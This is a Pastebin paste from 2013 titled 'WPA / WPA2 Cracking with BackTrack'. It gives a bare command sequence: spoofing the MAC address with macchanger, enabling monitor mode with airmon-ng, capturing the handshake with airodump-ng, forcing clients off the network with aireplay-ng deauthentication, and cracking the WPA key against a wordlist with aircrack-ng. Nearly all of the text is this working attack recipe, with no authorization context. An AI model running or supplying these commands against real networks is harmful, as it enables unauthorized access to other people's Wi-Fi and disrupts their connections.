ScottHelme

WPA / WPA2 Cracking with BackTrack

Sep 16th, 2013
1,031
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.34 KB | None | 0 0
  1. http://scotthel.me/CrackingWPA
  2.  
  3. ifconfig
  4. ifconfig (interface) down
  5. macchanger -m 00:11:22:33:44:55 (interface)
  6. ifconfig (interface) up
  7. airmon-ng start (interface)
  8. airodump-ng (monitor)
  9. airodump-ng --bssid (bssid) -c (channel) -w hackwpa (monitor)
  10. aireplay-ng -0 30 -a (bssid) (monitor)
  11. aircrack-ng -w (wordlist) -b (bssid) hackwpa*.cap
Add Comment
Please, Sign In to add comment